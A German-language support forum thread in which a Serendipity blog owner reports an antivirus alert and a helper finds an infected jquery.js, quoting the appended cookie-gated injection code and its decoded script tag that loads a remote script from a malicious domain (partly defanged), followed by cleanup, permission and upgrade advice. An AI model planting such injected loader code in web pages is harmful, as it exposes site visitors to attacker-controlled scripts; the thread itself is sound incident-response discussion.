Avast meldet mir Infektion

[jlr]

Hallo zusammen,

als ich eben auf meinem Blog vorbeisah, meldete mir Avast aus heiterem Himmel, es habe eine Infektion blockiert. Die Meldung war wie folgt:

Code: Select all

URL: http://gazette.rainlights.net/templates/jquery.js|{gzip}
Infektion: JS:Includer-BGC [Trj]
Prozess: C:\Program Files\Pale Moon\palemoon.exe

Ich will euch jetzt natürlich nicht bitten, da hinzugehen und euch das anzusehen (es sei denn, ihr wisst, was ihr tut) -- meine Fragen wären:

- zunächst, ob diese Meldung generell technisch überhaupt Sinn ergibt. Kann ein Trojaner (?) wirklich die Datei jquery.js infizieren? Oder ist das ein false positive?

- angenommen, es wäre wirklich was damit kaputt, haltet ihr es für gefahrlos möglich, eine Verbindung via ftp aufzubauen, die Datei zu löschen und durch ein altes Backup zu ersetzen? Viel mehr als das -- oder den kompletten Blog offline nehmen -- kann ich auf die Schnelle leider nicht tun, denn natürlich ist es jetzt einen Tag vor dem Urlaub.

Und zu guter Letzt: hab ich da was verbockt? Ich nutze noch Serendipity 1.6.2 und ein sehr altes Template. Oder hat da mein Provider (kontent.com) was durchgelassen, was er nicht hätte durchlassen sollen?

Danke für eure Ratschläge.

[Timbalu]

Ja, du hast tatsächlich ein jquery, an dessen Ende ein

Code: Select all

if(document.cookie.indexOf('logtime')==-1){var expires=new Date();expires.setTime(expires.getTime()+24*60*60*1000);document.cookie='logtime=Yes;path=/;expires='+expires.toGMTString();d-o-c-u-m-e-n-t.w-r-i-t-e(unescape('GEWURSCHTEL'));}

angehängt ist. Decodiert man das Gewurschtel

Code: Select all

'p3Cp73p63p72p69p70p74p20p74p79p70p65p3Dp22p74p65p78p74p2Fp6Ap61p76p61p73p63p72p69p70p74p22p20p73p72p63p3Dp22p68p74p74p70p3Ap2Fp2Fp64p6Fp63p74p6Fp72p6Dp65p64p69p63p61p6Cp2Ep69p6Ep2Fp64p6Fp63p74p6Fp72p2Ep70p68p70p22p3Ep3Cp2Fp73p63p72p69p70p74p3E'

in der unescape Klammer, kommt dabei

Code: Select all

<script type="text/javascript" src="http:// doctormedical. in / doctor . php"></script>

heraus.
(Edit: ohne "-" im d.write Aufruf und "p" statt "%" im encodetem, sowie Leerzeichem im decodetem Script. Wurde eingeführt, um wildgewordene Virenwächter zu beruhigen.)

Du kannst natürlich die Jquery version mit einer originalen Version überschreiben. Allerdings könnte es sehr gut sein, dass du weitere veränderte Dateien hast. Es kommt ein wenig darauf an, wie die Infektion stattgefunden hat (über S9y oder FTP oder Hoster Nachlässigkeiten).

Ich würde alle schreibbaren Verzeichnisse und Dateien genauer untersuchen. Angefangen mit der "Installation prüfen" Anwendung im Backend. Dann gibt es hier im Forum durchaus ein paar Threads zum Thema "hacked". Allerdings gab es nur ein Mal eine wirklich offene Verwundbarkeit eines ThirdParty Programmes (JS XINHA Editor) die auf mehreren Blogs tatsächlich auch ausgenutzt wurde. Das wurde m. W. vor langer Zeit mit S9y 1.5.5 gefixt.

Wie gesagt ist ein Rat in diesem Fall nicht ganz so einfach.
Auf alle Fälle würde aber ein Drüberbügeln einer kompletten Version schon einmal die größten Unsicherheiten beseitigen. Dann müsste man auch solche Fälle wie insbesondere das beschreibbare /uploads Directory und dein Theme genauer auf geänderte, bzw hinzugefügte Dateien hin untersuchen.

Vielleicht erst einmal soweit.
Viel Glück

PS. Dein Blog- und Webcleanup ist natürlich nur das eine.... Du solltest auch untersuchen, ob nicht schon dein aufrufender PC infiziert wurde.

[jlr]

Danke für die rasche Antwort.

Ich habe bereits eine Überprüfung meines Rechners durchgeführt, ohne Befund. Ich konnte die Meldung bislang auch nicht reproduzieren, aber Du hast ja bereits rausgefunden (Danke dafür!) dass da wirklich was passiert ist.

Um das noch mysteriöser zu machen: Als ich mich eben wieder hier einloggen wollte, sprang Avast erneut an, diesmal mit der Meldung

Code: Select all

URL: http://board.s9y.org/viewtopic.php?f=10&t=20401|{gzip}
Infektion: JS:Includer-BGC [Trj]

--- und diese Meldung kommt immer wieder und erschwert mir gerade sogar das Posten. Sag mir bitte nicht, dass sich das über mich irgendwie ausbreiten konnte, wie gesagt, Avast sagt mein Rechner sei sauber ...

[Timbalu]

Sehr lustig. Das ist dieser DEIN Thread. Da ich den Original Schad Code (als code natürlich völlig ungefährlich) hier gepostet habe, meckert dein Avast, jetzt natürliich aufmerksam geworden, auch darüber. Das ist aber eher Hyperventilation... Also keine Sorge.

Es kann sein, dass der "Doktor" dir nur einfach Werbemüll auf dein Blog zaubert.
Auf alle Fälle muss man den genauen Infektionsweg herausfinden und künftig fest verschließen. Zb durch geeignete Permissions (http://www.s9y.org/11.html#A15).

Edit: Ich habe meinen ersten Beitrag etwas verändert, so dass dein Wächter vielleicht weniger kritisch ist.

[jlr]

Uffz, das beruhigt mich Avast schlägt aber immer noch an, vielleicht sollten wir den Code wieder rausnehmen, bevor auch andere User sich nicht mehr hier reintrauen.

Update zum Problem: Ich habe inzwischen festgestellt, dass das jquery in dem Verzeichnis überhaupt nichts verloren hatte und erst vier Tage alt war. Ich habe es jetzt gelöscht.

Die Integritätsprüfung des Blogs lief gut (ohne Befund). Das Upload-Verzeichnis war sauber.

Aktuell update ich auf 1.7.8 und so lass ich das dann über den Urlaub mal stehen. Ich vermute auch, dass der gute Doktor einfach nur Teil oder Ursache eines Spam-Angriffs war (hatte ich der Vergangenheit tatsächlich häufiger "medical" spam). Danach schaue ich mir noch mal meine Permissions an und überprüfe alles noch mal, wenn ich wieder zurück bin.

Vielen Dank noch mal für die rasche und hilfreiche Antwort!

[Timbalu]

Nee, du hast zwar auf S9y v1.7.8 aktualisiert - das jQuery ist aber immer noch das infizierte jQuery v1.6.4 in /templates. Da hat dir wahrscheinlich dein FTP upload einen Streich gespielt. Wichtige Einstellung ist "binary mode" und "force overwrite"!
Ansonsten lebt das Serendipity jQuery tatsächlich im templates Ordner, sollte aber jetzt jQuery v1.8.3 sein, siehe https://github.com/s9y/Serendipity/blob ... /jquery.js.

Diesem Datum (von vor vier Tagen) solltest du auch nochmal nachspüren. Hosters access. und error. logs etc.

[jlr]

Bist du sicher? Die Datei, die mir Filezilla anzeigt, trägt die Nummer v1.8.3 in der ersten Zeile, und enthält den fraglichen Link am Ende nicht. Kann aber sein, dass erst was schief ging, das erste Update machte Probleme, ich hab inzwischen nochmal alles überschrieben ...

PS Ich kann hier immer noch nur vom Tablet aus posten, am PC lässt mich Avast nicht rein

[Timbalu]

Ja, jetzt ist alles in Ordnung.

(Zum jammernden Avast: Ich überarbeite das Posting nochmal. Ganz zu löschen wäre schade, denn es könnte eventuell ja mal jemandem hilfreich sein.)

[jlr]

Danke nochmal. Insgesamt hat sich die Arbeit auf jeden Fall gelohnt, Serendipity 1.7.8 gefällt mir sehr gut, und ich hätte schon längst mal wieder upgraden sollen. Alles weitere nach dem Urlaub

[Timbalu]

Tja, aber es ist natürlich auch nur die letzte "major" version. Aktuell sind wir bei v.2.0.1

[jlr]

Ich weiß ich weiß Ich hab nur Angst, dass mir da mein altes Template um die Ohren fliegt. Dazu brauche ich mal einen freien Nachmittag, um mich da ranzutrauen...